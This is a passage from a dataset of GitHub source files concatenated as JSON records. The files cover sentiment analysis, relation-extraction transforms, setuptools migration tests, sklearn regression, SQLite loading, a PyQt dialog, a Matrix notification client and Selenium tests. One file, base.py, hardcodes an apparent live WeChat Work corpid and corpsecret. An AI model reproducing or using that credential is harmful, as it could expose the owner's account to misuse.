EmotionAnalysis(ltp)\n\n sent = '苹果说,用户从即日起可以预定新款iPad,有关产品将于3月16日开始率先在美国、澳大利亚、加拿大、法国、中国香港和新加坡等10多个国家和地区率先上市。'\n\n print(analyzer.sent_sentiment_score(sent.strip()))\n","repo_name":"695573425/TDTSystem","sub_path":"emotion/emotion.py","file_name":"emotion.py","file_ext":"py","file_size_in_byte":8092,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"} +{"seq_id":"1173867852","text":"from collections import defaultdict\nfrom typing import Iterable, List, Optional\n\nfrom rex.data.label_encoder import LabelEncoder\nfrom rex.data.transforms.base import TransformBase\nfrom rex.data.vocab import Vocab\nfrom rex.utils.logging import logger\nfrom rex.utils.mask import construct_piecewise_mask\nfrom rex.utils.position import construct_relative_positions, find_all_positions\nfrom rex.utils.progress_bar import pbar\n\n\nclass CachedMCMLSentRETransform(TransformBase):\n \"\"\"\n Data transform for cached multi-class multi-label sentence-level relation extraction task.\n \"\"\"\n\n def __init__(self, max_seq_len, rel2id_filepath, emb_filepath) -> None:\n super().__init__()\n\n self.max_seq_len = max_seq_len\n self.vocab = Vocab.from_pretrained(\n emb_filepath,\n include_weights=True,\n init_pad_unk_emb=False,\n include_pad=False,\n include_unk=False,\n )\n self.label_encoder = LabelEncoder.from_pretrained(rel2id_filepath)\n\n def transform(\n self,\n data: Iterable,\n desc: Optional[str] = \"Transform\",\n debug: Optional[bool] = False,\n ) -> List[dict]:\n num_truncated_rels = 0\n final_data = []\n if debug:\n data = data[:5]\n transform_loader = pbar(data, desc=desc)\n\n for d in transform_loader:\n ent_validation = []\n for ent in d[\"entities\"]:\n if ent[2] > self.max_seq_len:\n ent_validation.append(False)\n continue\n ent_validation.append(True)\n valid_ent_pair2rels = defaultdict(set)\n for rel in d[\"relations\"]:\n if ent_validation[rel[1]] is False or ent_validation[rel[2]] is False:\n num_truncated_rels += 1\n continue\n valid_ent_pair2rels[(rel[1], rel[2])].add(\n self.label_encoder.encode_one(rel[0])\n )\n if len(valid_ent_pair2rels) == 0:\n continue\n token_ids, _ = self.vocab.encode(\n d[\"tokens\"], self.max_seq_len, update=False\n )\n for ent_pair, rels in valid_ent_pair2rels.items():\n head_pos = construct_relative_positions(\n d[\"entities\"][ent_pair[0]][1], self.max_seq_len\n )\n tail_pos = construct_relative_positions(\n d[\"entities\"][ent_pair[1]][1], self.max_seq_len\n )\n final_data.append(\n {\n \"id\": d[\"id\"],\n \"token_ids\": token_ids,\n \"mask\": construct_piecewise_mask(\n d[\"entities\"][ent_pair[0]][1],\n d[\"entities\"][ent_pair[1]][1],\n min(len(d[\"tokens\"]), self.max_seq_len),\n self.max_seq_len,\n ),\n \"labels\": rels,\n \"head_pos\": head_pos,\n \"tail_pos\": tail_pos,\n }\n )\n final_data = list(filter(lambda x: x is not None, final_data))\n for d in final_data:\n d[\"labels\"] = self.label_encoder.convert_to_multi_hot(d[\"labels\"])\n logger.info(transform_loader)\n logger.warning(f\"#truncated_rels: {num_truncated_rels}\")\n return final_data\n\n def predict_transform(self, obj: dict):\n \"\"\"Transform for prediction\n\n Args:\n obj: dict object with ``text`` (str), ``head`` (str) and ``tail`` (str) fields\n \"\"\"\n if obj[\"head\"] not in obj[\"text\"] or obj[\"tail\"] not in obj[\"text\"]:\n raise ValueError(f\"{obj['head']} or {obj['tail']} is not in {obj['text']}\")\n head_pos = find_all_positions(obj[\"text\"], obj[\"head\"])[0]\n tail_pos = find_all_positions(obj[\"text\"], obj[\"tail\"])[0]\n if head_pos[1] > self.max_seq_len:\n logger.warning(\"head entity truncated\")\n head_pos = [self.max_seq_len - 1, self.max_seq_len]\n if tail_pos[1] > self.max_seq_len:\n logger.warning(\"tail entity truncated\")\n tail_pos = [self.max_seq_len - 1, self.max_seq_len]\n token_ids, _ = self.vocab.encode(\n list(obj[\"text\"]), self.max_seq_len, update=False\n )\n d = {\n \"id\": \"\",\n \"token_ids\": token_ids,\n \"mask\": construct_piecewise_mask(\n head_pos[0],\n tail_pos[0],\n min(len(obj[\"text\"]), self.max_seq_len),\n self.max_seq_len,\n ),\n \"labels\": None,\n \"head_pos\": construct_relative_positions(head_pos[0], self.max_seq_len),\n \"tail_pos\": construct_relative_positions(tail_pos[0], self.max_seq_len),\n }\n return d\n","repo_name":"Spico197/REx","sub_path":"rex/data/transforms/sent_re.py","file_name":"sent_re.py","file_ext":"py","file_size_in_byte":4903,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"18"} +{"seq_id":"33536426721","text":"\"\"\"\nTests of the \"simple cases\", where the data in setup.cfg or setup.py is read\nin by setuptools, stored as-is, and added directly or with minor transformations\ninto the pyproject data structure, rather than being parsed and used to\nconfigure some kind of dynamic functionality.\n\"\"\"\n\nimport pytest\n\nfrom typing import List\n\n\ndef test_name_and_version(project) -> None:\n \"\"\"\n Test we can generate a basic project skeleton.\n \"\"\"\n setup_cfg = \"\"\"\\\n[metadata]\nname = test-project\nversion = 0.0.1\n\"\"\"\n pyproject = {\n \"build-system\": {\n \"requires\": [\"setuptools\"],\n \"build-backend\": \"setuptools.build_meta\",\n },\n \"project\": {\n \"name\": \"test-project\",\n \"version\": \"0.0.1\",\n },\n }\n project.setup_cfg(setup_cfg)\n project.setup_py()\n result = project.generate()\n assert result == pyproject\n\n\n# install_requires tests, we use made-up module names here.\n\n\ndef test_install_requires(project) -> None:\n \"\"\"\n Test the install_requires is passed through if given.\n \"\"\"\n setup_cfg = \"\"\"\\\n[metadata]\nname = test-project\nversion = 0.0.1\n\n[options]\ninstall_requires =\n dependency1\n dependency2>=1.23\n dependency3<4.56\n\"\"\"\n pyproject = {\n \"build-system\": {\n \"requires\": [\"setuptools\"],\n \"build-backend\": \"setuptools.build_meta\",\n },\n \"project\": {\n \"name\": \"test-project\",\n \"version\": \"0.0.1\",\n \"dependencies\": [\"dependency1\", \"dependency2>=1.23\", \"dependency3<4.56\"],\n },\n }\n project.setup_cfg(setup_cfg)\n project.setup_py()\n result = project.generate()\n assert result == pyproject\n\n\n# setup_requires tests: we have to use real dependencies that actually are\n# installed, otherwise the tests will fail.\n\n\ndef test_setup_requires(project) -> None:\n \"\"\"\n Test setup_requires is passed through with 'setuptools' dependency.\n \"\"\"\n setup_cfg = \"\"\"\\\n[metadata]\nname = test-project\nversion = 0.0.1\n\n[options]\nsetup_requires =\n sphinx\n pytest>=6\n pytest-black<99.88.77\n\"\"\"\n pyproject = {\n \"build-system\": {\n \"requires\": [\"pytest-black<99.88.77\", \"pytest>=6\", \"setuptools\", \"sphinx\"],\n \"build-backend\": \"setuptools.build_meta\",\n },\n \"project\": {\n \"name\": \"test-project\",\n \"version\": \"0.0.1\",\n },\n }\n project.setup_cfg(setup_cfg)\n project.setup_py()\n result = project.generate()\n assert result == pyproject\n\n\ndef test_setup_requires_setuptools(project) -> None:\n \"\"\"\n Test that we don't duplicate 'setuptools' in build requirements\n \"\"\"\n setup_cfg = \"\"\"\\\n[metadata]\nname = test-project\nversion = 0.0.1\n\n[options]\nsetup_requires =\n setuptools\n sphinx\n pytest>=6\n pytest-black<99.88.77\n\"\"\"\n pyproject = {\n \"build-system\": {\n \"requires\": [\"pytest-black<99.88.77\", \"pytest>=6\", \"setuptools\", \"sphinx\"],\n \"build-backend\": \"setuptools.build_meta\",\n },\n \"project\": {\n \"name\": \"test-project\",\n \"version\": \"0.0.1\",\n },\n }\n project.setup_cfg(setup_cfg)\n project.setup_py()\n result = project.generate()\n assert result == pyproject\n\n\ndef test_setup_requires_setuptools_version(project) -> None:\n \"\"\"\n Test we can handle a build system that requires a specific setuptools version.\n \"\"\"\n setup_cfg = \"\"\"\\\n[metadata]\nname = test-project\nversion = 0.0.1\n\n[options]\nsetup_requires =\n setuptools>=34.56\n sphinx\n pytest>=6\n pytest-black<99.88.77\n\"\"\"\n pyproject = {\n \"build-system\": {\n \"requires\": [\"pytest-black<99.88.77\", \"pytest>=6\", \"setuptools>=34.56\", \"sphinx\"],\n \"build-backend\": \"setuptools.build_meta\",\n },\n \"project\": {\n \"name\": \"test-project\",\n \"version\": \"0.0.1\",\n },\n }\n project.setup_cfg(setup_cfg)\n project.setup_py()\n result = project.generate()\n assert result == pyproject\n\n\ndef test_description(make_write_pyproject) -> None:\n description = \"Description of TestProject\"\n\n cmd = make_write_pyproject(description=description)\n result = cmd._generate()\n assert result[\"project\"][\"description\"] == description\n\n\ndef test_empty_description(make_write_pyproject) -> None:\n description = \"\"\n\n cmd = make_write_pyproject(description=description)\n result = cmd._generate()\n assert \"description\" not in result[\"project\"]\n\n\n@pytest.mark.parametrize(\n \"keywords\",\n [\n [\"hovercraft\", \"full\", \"of\", \"eels\"],\n [\"\"],\n [\"hovercraft\", \"full of\", \"eels\"],\n ],\n ids=[\"simple\", \"zero-length\", \"space\"],\n)\ndef test_keywords(make_write_pyproject, keywords: List[str]) -> None:\n cmd = make_write_pyproject(keywords=keywords)\n result = cmd._generate()\n assert result[\"project\"][\"keywords\"] == keywords\n\n\ndef test_no_keywords(make_write_pyproject) -> None:\n cmd = make_write_pyproject(keywords=[])\n result = cmd._generate()\n assert \"keywords\" not in result[\"project\"]\n\n\ndef test_keywords_not_given(make_write_pyproject) -> None:\n cmd = make_write_pyproject()\n result = cmd._generate()\n assert \"keywords\" not in result[\"project\"]\n","repo_name":"diazona/setuptools-pyproject-migration","sub_path":"tests/test_static_data.py","file_name":"test_static_data.py","file_ext":"py","file_size_in_byte":5274,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"29812651644","text":"import requests\nfrom requests import Session\n\n\nclass Base:\n def __init__(self):\n self.s = Session()\n self.corpid = 'wwf793a42682053e6e'\n self.corpsecret = 'qdXH8QRbJhkgXu3jlP0S531suzE6cZ8LTwOQkJ4d1F8'\n self.s.params[\"access_token\"] = self.get_token().get(\"access_token\")\n\n def get_token(self, corpid=None, corpsecret=None):\n if corpid is None:\n corpid = self.corpid\n if corpsecret is None:\n corpsecret = self.corpsecret\n params = {\"corpid\": corpid, \"corpsecret\": corpsecret}\n token_response = requests.get('https://qyapi.weixin.qq.com/cgi-bin/gettoken', params=params)\n return token_response.json()\n","repo_name":"PAssassiN/hogwarts_ck16","sub_path":"test_api_requests/requests_page/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"353864563","text":"def merge(left, right):\n res = []\n while left and right:\n if left[0] < right[0]:\n res.append(left.pop(0))\n else:\n res.append(right.pop(0))\n if not left:\n res += right\n else:\n res += left\n return res\nA = [int(x) for x in input().split()]\nB = [int(x) for x in input().split()]\nprint(*merge(A, B))\n","repo_name":"alekseik1/python_mipt_study","sub_path":"2sem/repeat_algs/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"9456539252","text":"#!/usr/bin/env python3\n\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import mean_absolute_error\n\n######################################################################################\n\n#---------------------\n# ingest data\n# https://www.kaggle.com/dansbecker/melbourne-housing-snapshot/download\n#---------------------\nmelbourne_file_path = 'data/melb_data.csv'\nX_full = pd.read_csv(melbourne_file_path)\n\n# drop data with missing values\nX_reduced = X_full.dropna(axis=0)\n\nprint(\"X_full shape: {}\".format(X_full.shape))\nprint(\"X_reduced shape: {}\".format(X_reduced.shape))\n\n\n#-----------------------------\n# building learning model\n# https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.RandomForestRegressor.html\n#-----------------------------\n# setting the prediction target (traditionally labeled 'y')\ny = X_reduced.Price\n\n# choosing the training features (traditionally labeled 'X')\nfeatures = ['Rooms', 'Bathroom', 'Landsize', 'Lattitude', 'Longtitude']\nX = X_reduced[features]\n\n# split training/validation data\ntrain_X, val_X, train_y, val_y = train_test_split(X, y, random_state=0)\nprint(\"train_X shape: {}\".format(train_X.shape), end='\\n\\n')\n\nmelbourne_model = RandomForestRegressor(random_state=1)\nmelbourne_model.fit(train_X, train_y)\n\n\n#-----------------------------\n# model validation (MAE)\n# https://scikit-learn.org/stable/modules/classes.html?highlight=metrics#module-sklearn.metrics\n#-----------------------------\nval_predictions = melbourne_model.predict(val_X)\nval_MAE = mean_absolute_error(val_y, val_predictions)\nprint(\"Mean Absolute Error in predicted home prices: {:.2f}\".format(val_MAE))\n","repo_name":"Neutrollized/learning-machine-learning","sub_path":"02_melbourne_model.py","file_name":"02_melbourne_model.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10899396152","text":"from aws_cdk import aws_ssm as ssm\nfrom constructs import Construct\n\n\nclass CdkDocument:\n def CreateChangeCalendar(self, scope: Construct):\n content = \"BEGIN:VCALENDAR\\r\\nPRODID:-//AWS//Change Calendar 1.0//EN\\r\\nVERSION:2.0\\r\\nX-CALENDAR-TYPE:DEFAULT_CLOSED\\r\\nX-WR-CALDESC:詳細\\r\\nBEGIN:VTODO\\r\\nDTSTAMP:20200320T004207Z\\r\\nUID:3b5af39a-d0b3-4049-a839-d7bb8af01f92\\r\\nSUMMARY:Add events to this calendar.\\r\\nEND:VTODO\\r\\nEND:VCALENDAR\\r\\n\"\n\n # Content only accepts json. Therefore pass it empty and overwrite it later.\n doc: ssm.CfnDocument = ssm.CfnDocument(\n scope,\n \"ChangeCalendar\",\n content={},\n document_type=\"ChangeCalendar\",\n document_format=\"TEXT\",\n name=\"ChangeCalendar\",\n update_method=\"NewVersion\",\n )\n doc.add_property_override(\"Content\", content)\n","repo_name":"lio0oil/cdk_sample","sub_path":"cdk_sample/cdk_document.py","file_name":"cdk_document.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25581378409","text":"# https://atcoder.jp/contests/joi2011yo/tasks/joi2011yo_e\n\n# 問題文を読み間違えて無限に時間を溶かしたのはもったいない!よく問題を読もうね!\n\nfrom collections import deque\nimport sys\nread = sys.stdin.readline\n\n\ndef read_ints():\n return list(map(int, read().split()))\n\n\ndef read_a_int():\n return int(read())\n\n\ndef read_matrix(H):\n '''\n H is number of rows\n '''\n return [list(map(int, read().split())) for _ in range(H)]\n\n\ndef read_map(H):\n '''\n H is number of rows\n 文字列で与えられた盤面を読み取る用\n '''\n return [read() for _ in range(H)]\n\n\ndef read_col(H, n_cols):\n '''\n H is number of rows\n n_cols is number of cols\n\n A列、B列が与えられるようなとき\n '''\n ret = [[] for _ in range(n_cols)]\n for _ in range(H):\n tmp = list(map(int, read().split()))\n for col in range(n_cols):\n ret[col].append(tmp[col])\n\n return ret\n\n\nH, W, N = read_ints()\nMAP = read_map(H)\n\n# S(0)と数字の座標を格納しておくリスト\nn_yx = [0] * (N + 1)\nfor i, row in enumerate(MAP):\n for j, m in enumerate(row):\n if m == 'S':\n n_yx[0] = (i, j)\n continue\n\n for k in range(1, N + 1):\n if m == str(k):\n n_yx[k] = (i, j)\n break\n # 探索の準備\nmvx = (1, 0, -1, 0)\nmvy = (0, 1, 0, -1)\n\n\ndef bfs(s, g, n_s):\n '''\n sの座標を受け取ってgの座標にたどり着く最短距離を返す\n ただしn_sに従って、それより大きい数字のマスは移動することができない。\n '''\n sy, sx = s\n gy, gx = g\n\n visited = [[False] * W for _ in range(H)]\n # queueにスタックさせる配列の内容は考えておこう\n # 今回ならば、(探索するx,y,今までの移動距離)を入れておけばよいだろう。\n que = deque([(sy, sx, 0)])\n visited[sy][sx] = True # queに入ったところは訪れるのが確定している。\n # 幅優先探索\n while que:\n y, x, cost = que.popleft()\n\n if y == gy and x == gx:\n return cost\n\n for dy, dx in zip(mvy, mvx):\n y_new, x_new = y + dy, x + dx\n # 探索に含めない条件\n if not (-1 < y_new < H) or not (-1 < x_new < W):\n continue\n if visited[y_new][x_new]:\n continue\n\n if MAP[y_new][x_new] == 'X':\n continue\n\n # 探索に追加してあげる\n que.append((y_new, x_new, cost + 1))\n visited[y_new][x_new] = True\n\n print('something wrong')\n\n\nans = 0\nfor i in range(N):\n # print(i)\n ans += bfs(n_yx[i], n_yx[i+1], i)\n # print(ans)\nprint(ans)\n\n'''\n.X...X.S.X\n6..5X..X1X\n...XXXX..X\nX..9X...X.\n8.X2X..X3X\n...XX.X4..\nXX....7X..\nX..X..XX..\nX...X.XX..\n..X.......\n'''\n","repo_name":"masakiaota/kyoupuro","sub_path":"practice/novice/JOI2010_E.py","file_name":"JOI2010_E.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"31581727453","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n#Number of bins\\\r\nN=1000\r\n#Number of random numbers\\\r\nn=10000\r\n\r\n\r\ndef g(u1,N,n):\r\n x1=(np.random.rand(n))\r\n for i in range(len(x1)):\r\n x1[i]=0.01+(0.99-0.01)*x1[i]\r\n \r\n #Function for generation\\\r\n\r\n def f(u,x):\r\n return u*np.tan(np.pi*(x-0.5))\r\n\r\n #Function for verification\\\r\n def V(u,x):\r\n return u/((u**2+x**2)*np.pi)\r\n\r\n #Code for sorting into bins\\\r\n a = np.sort(f(u1,x1))\r\n\r\n b=(a+np.abs(np.amin(a)))/(np.amax(a)-np.amin(a))\r\n '''print a\r\n print b\r\n print np.amin(a),np.amax(a)-np.amin(a)'''\r\n\r\n da=(np.amax(a)-np.amin(a))/N\r\n y=(b*N)\r\n y=y.astype(int)\r\n c=[]\r\n z=list(y)\r\n for i in range(N):\r\n z1=z.count(i)\r\n c.append(z1)\r\n \r\n \r\n w1=np.linspace(np.min(a),np.max(a),len(a))\r\n g=np.asarray(c)\r\n\r\n #Code for normaliztion\\\r\n g1=np.sum(g*da)\r\n w=np.arange(np.min(a),np.max(a),da)\r\n w=w[:len(g)]\r\n return w,g/g1,V(u1,w),a\r\n\r\n #print g1 \r\n #plt.plot(w,g/g1)\r\n #plt.hist(a,N)\r\n #plt.show()\r\n #v=np.sum(g/g1)*da\r\n #print v\r\n\r\n\r\n#Values of gamma\r\n\r\nu2=[2,3,6]\r\n#si2=[1,1,16]\r\n\r\n#Plots\r\nplt.figure(1)\r\nfor i in range(len(u2)):\r\n a1,b1,c1,d=g(u2[i],N,n)\r\n plt.subplot(2,2,i+1)\r\n \r\n plt.plot(a1,b1,label='Generated Lorentzian')\r\n plt.plot(a1,c1,label='Formulated Lorentzian')\r\n #plt.hist(d,1000)\r\n plt.legend()\r\n plt.title('Gamma = '+str(u2[i]))\r\n plt.xlabel('X')\r\n \r\n plt.ylabel('P(X)')\r\n \r\nplt.show()\r\n","repo_name":"pranavgc/Numerical_Physics","sub_path":"WS03_box_muller/p3.py","file_name":"p3.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5539143529","text":"# -*- coding: utf-8 -*-\n\nimport sqlite3\nimport os\nimport json\n\n\ndef mkcmd(tabele_name, data, autoid=False):\n\ttry:data=data[0]\n\texcept:raise(Exception(\"input data as list. \\nactual: %s\"%(type(data))))\n\n\tcmd=[]\n\tif autoid:\n\t\tcmd.append(\"id integer primary key autoincrement\")\n\tfor key,value in data.items():\n\t\tcmd_one = str(key)\n\t\tif type(value)==type(0):\n\t\t\tcmd_one+= \" int\"\n\t\tif type(value)==type(0.):\n\t\t\tcmd_one+= \" float\"\n\t\tif type(value)==type(u\"\"):\n\t\t\tcmd_one+= \" text\"\n\t\tif type(value)==type([]):\n\t\t\tcmd_one+= \" sqlist\"\n\n\t\tcmd.append(cmd_one)\n\t\tresistration_cmd=\"create table if not exists %s (\"%tabele_name + \", \".join(cmd) + \")\"\n\t\tinsert_cmd = \"insert into\" + \" %s \"%tabele_name + \"(%s)\"%\", \".join(data.keys()) + \" values \" + \"(%s)\"%\",\".join([\"?\"]*len(data))\n\t\tsort_index=data.keys()\n\treturn resistration_cmd,insert_cmd,sort_index\n\ndef register_data(tabele_name, database_name, data, autoid=True):\n\tsqlite3.register_adapter(list, lambda l: ';'.join([str(i) for i in l]))\n\tsqlite3.register_converter(\"sqlist\", lambda s: [(i) for i in s.split(';')])\n\tcon = sqlite3.connect(database_name,detect_types = sqlite3.PARSE_DECLTYPES)\n\tcon.row_factory = sqlite3.Row\n\n\tcreate_table, insert_sql, sort= mkcmd(tabele_name, data, autoid)\n\tcon.execute(create_table)\n\tcontent = [j_one.values() for j_one in data]\n\tcon.executemany(insert_sql,content)\n\tcon.commit()\n\ndef load_data(tabele_name, database_name):\n\tcon = sqlite3.connect(database_name,detect_types = sqlite3.PARSE_DECLTYPES)\n\tcon.row_factory = sqlite3.Row\n\tcur = con.cursor()\n\tselect_sql = 'select * from %s'%tabele_name\n\tcur.execute(select_sql)\n\treturn cur.fetchall()\n\nif __name__ == \"__main__\":\n\tdbname = 'database.db'\n\tos.remove(dbname)\n\tj=json.load(open(\"title.json\"))\n\tregister_data(\"titles\", dbname, j, autoid=False)\n\t# print len(load_data(\"titles\", dbname))\n\n\n","repo_name":"sammrai/VideoListViwer","sub_path":"json2sqldata/json2sql.py","file_name":"json2sql.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41958001738","text":"from PyQt5.QtCore import QStringListModel, pyqtSignal\r\nfrom Front.ui_SelectVar import Ui_Dialog\r\nfrom PyQt5 import QtWidgets\r\n\r\n\r\nclass SelectVar(QtWidgets.QDialog, Ui_Dialog):\r\n \"\"\"Menu used to select the features and target of a data\"\"\"\r\n trigger = pyqtSignal(object)\r\n\r\n def __init__(self, *args, **kwargs):\r\n super(SelectVar, self).__init__(*args, **kwargs)\r\n # Initializing from ui.file (designer)\r\n self.setupUi(self)\r\n # Initializing the Features and Target Columns\r\n self.Target.setModel(QStringListModel())\r\n self.Features.setModel(QStringListModel())\r\n # When button are clicked\r\n self.feature_push.clicked.connect(self.add_feature)\r\n self.target_push.clicked.connect(self.add_target)\r\n self.feature_cancel.clicked.connect(self.cancel_feature)\r\n self.target_cancel.clicked.connect(self.cancel_target)\r\n # When the Users clicked on the button \"Ok\"\r\n self.buttonBox.accepted.connect(self.accept_value)\r\n\r\n def add_target(self):\r\n \"\"\"Clean Target List,Add a column name from Variables List to Target List \"\"\"\r\n self.Target.setModel(QStringListModel())\r\n cu_data = self.Variables.currentIndex().data()\r\n list_va = self.Target.model().stringList()\r\n list_va.append(cu_data)\r\n self.Target.model().setStringList((list(set(list_va))))\r\n\r\n def add_feature(self):\r\n \"\"\"Add a column name from Variables List to Features List \"\"\"\r\n cu_data = self.Variables.currentIndex().data()\r\n list_va = self.Features.model().stringList()\r\n list_va.append(cu_data)\r\n self.Features.model().setStringList((list(set(list_va))))\r\n\r\n def cancel_feature(self):\r\n \"\"\" Remove Feature from Features List \"\"\"\r\n cu_data = self.Variables.currentIndex().data()\r\n list_va = self.Features.model().stringList()\r\n list_va = [x for x in list_va if x != cu_data]\r\n self.Features.model().setStringList((list(set(list_va))))\r\n\r\n def cancel_target(self):\r\n \"\"\" Remove Target from Target List \"\"\"\r\n cu_data = self.Target.currentIndex().data()\r\n list_va = self.Target.model().stringList()\r\n list_va = [x for x in list_va if x != cu_data]\r\n self.Target.model().setStringList((list(set(list_va))))\r\n\r\n def accept_value(self):\r\n \"\"\"When the user clicked pn \"Ok\" => send the information\r\n from target and features as Signal\"\"\"\r\n tar_name = self.Target.model().stringList()\r\n fea_name = self.Features.model().stringList()\r\n self.Target.setModel(QStringListModel())\r\n self.Features.setModel(QStringListModel())\r\n self.close()\r\n self.trigger.emit([tar_name, fea_name])\r\n","repo_name":"baptlano24/PyTanagra","sub_path":"Front/SelectVar.py","file_name":"SelectVar.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1976781742","text":"import json\nimport os\nimport sys\nimport asyncio\nfrom nio import AsyncClientConfig, MatrixRoom, RoomMessageText, AsyncClient, LoginResponse\n\nfrom eliot import log_call, start_action, Message\nimport markdown\nfrom nio.event_builders.state_events import EnableEncryptionBuilder\nfrom nio.responses import RoomCreateResponse\n\nimport ekklesia_notify.settings\n\nsettings = ekklesia_notify.settings.settings.transport_settings.matrix\n\n\ndef make_client():\n client_config = AsyncClientConfig(encryption_enabled=True)\n return AsyncClient(\n settings.homeserver,\n settings.mxid,\n device_id=settings.device_id,\n config=client_config,\n store_path=settings.store_dir\n )\n\n\n@log_call\ndef write_details_to_disk(resp: LoginResponse) -> None:\n \"\"\"Writes login details to disk so that we can restore our session later\n without logging in again and creating a new device ID.\n Arguments:\n resp {LoginResponse} -- the successful client login response.\n \"\"\"\n with open(settings.session_details_file, \"w\") as f:\n json.dump({\"access_token\": resp.access_token, \"device_id\": resp.device_id, \"user_id\": resp.user_id}, f)\n\n\n@log_call\nasync def login(cl) -> None:\n \"\"\"Log in either using the global variables or (if possible) using the\n session details file.\n \"\"\"\n # Restore the previous session if we can\n # See the \"restore_login.py\" example if you're not sure how this works\n session_details_file = settings.session_details_file\n\n if os.path.exists(session_details_file) and os.path.isfile(session_details_file):\n try:\n with open(session_details_file, \"r\") as f:\n config = json.load(f)\n cl.access_token = config['access_token']\n cl.user_id = config['user_id']\n cl.device_id = config['device_id']\n\n # This loads our verified/blacklisted devices and our keys\n cl.load_store()\n print(f\"Logged in using stored credentials: {cl.user_id} on {cl.device_id}\")\n\n except IOError as err:\n print(f\"Couldn't load session from file. Logging in. Error: {err}\")\n except json.JSONDecodeError:\n print(\"Couldn't read JSON file; overwriting\")\n\n # We didn't restore a previous session, so we'll log in with a password\n if not cl.user_id or not cl.access_token or not cl.device_id:\n # this calls the login method defined in AsyncClient from nio\n resp = await cl.login(settings.password.get_secret_value())\n\n if isinstance(resp, LoginResponse):\n print(\"Logged in using a password; saving details to disk\")\n write_details_to_disk(resp)\n else:\n print(f\"Failed to log in: {resp}\")\n sys.exit(1)\n\n\nasync def after_first_sync(cl: AsyncClient):\n with start_action(action_type=\"after_first_sync\") as action:\n await cl.synced.wait()\n resp = await cl.joined_rooms()\n action.add_success_fields(joined_rooms=resp.rooms, cl_rooms=cl.rooms)\n\n\nasync def message_callback(room: MatrixRoom, event: RoomMessageText) -> None:\n print(f\"Message received in room {room.display_name}\\n\" f\"{room.user_name(event.sender)} | {event.body}\")\n\n\nasync def send(cl: AsyncClient, room_id: str, body: str):\n formatted_body = markdown.markdown(body)\n\n with start_action(action_type=\"send\", room_id=room_id, cl_rooms=cl.rooms) as action:\n resp = await cl.room_send(\n room_id=room_id,\n message_type=\"m.room.message\",\n ignore_unverified_devices=True,\n content={\n \"msgtype\": \"m.text\",\n \"body\": body,\n \"format\": \"org.matrix.custom.html\",\n \"formatted_body\": formatted_body\n }\n )\n action.add_success_fields(response=resp)\n\n\n@log_call\ndef find_room_id(cl, mxid):\n for room_id, room in cl.rooms.items():\n if mxid in room.users:\n return room_id\n\n\n@log_call\nasync def get_or_create_direct_room(cl: AsyncClient, mxid: str) -> str:\n\n room_id = find_room_id(cl, mxid)\n\n if room_id:\n Message.log(msg=\"using existing room\", room=room_id)\n return room_id\n\n with start_action(action_type=\"create_direct_room\", recipient=mxid) as action:\n resp = await cl.room_create(\n name=\"Benachrichtigungen\",\n topic=\"Hier gibts Benachrichtigungen\",\n federate=False,\n invite=[mxid],\n initial_state=[EnableEncryptionBuilder().as_dict()]\n )\n if isinstance(resp, RoomCreateResponse):\n action.add_success_fields(response=resp)\n else:\n raise Exception(\"failed to create room\")\n\n room_id = resp.room_id\n\n with start_action(action_type=\"join_room\", room=room_id):\n await cl.join(room_id)\n\n return room_id\n\n\nasync def message_to_recipient(body: str, recipient: str):\n cl = make_client()\n await login(cl)\n asyncio.create_task(cl.sync_forever(timeout=30000, full_state=True))\n await after_first_sync(cl)\n room_id = await get_or_create_direct_room(cl, recipient)\n await send(cl, room_id, body)\n","repo_name":"edemocracy/ekklesia-notify","sub_path":"src/ekklesia_notify/lib/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":5160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"19801442","text":"import unittest\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\nfrom selenium.webdriver.common.keys import Keys\n\n\nclass NewVisitorTest(unittest.TestCase): #➊\n def setUp(self): #➋\n self.binary = FirefoxBinary(\"C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe\")\n self.browser = webdriver.Firefox(firefox_binary=self.binary)\n self.browser.implicitly_wait(9)\n\n def tearDown(self): #➌\n self.browser.quit()\n\n def check_for_row_in_list_table(self, row_text):\n table = self.browser.find_element_by_id('id_list_table')\n rows = table.find_elements_by_tag_name('tr')\n self.assertIn(row_text, [row.text for row in rows])\n\n def test_can_start_a_list_and_retrieve_it_later(self): #➍\n # 伊迪丝听说有一个很酷的在线待办事项应用\n # 她去看了这个应用的首页\n self.browser.get('http://localhost:8000')\n\n # 她注意到网页的标题和头部都包含“To-Do”这个词\n self.assertIn('To-Do', self.browser.title) #➎\n header_text = self.browser.find_element_by_tag_name('h1').text\n self.assertIn('To-Do', header_text)\n\n # 应用邀请她输入一个待办事项\n inputbox = self.browser.find_element_by_id('id_new_item')\n self.assertEqual(inputbox.get_attribute('placeholder'),\n 'Enter a 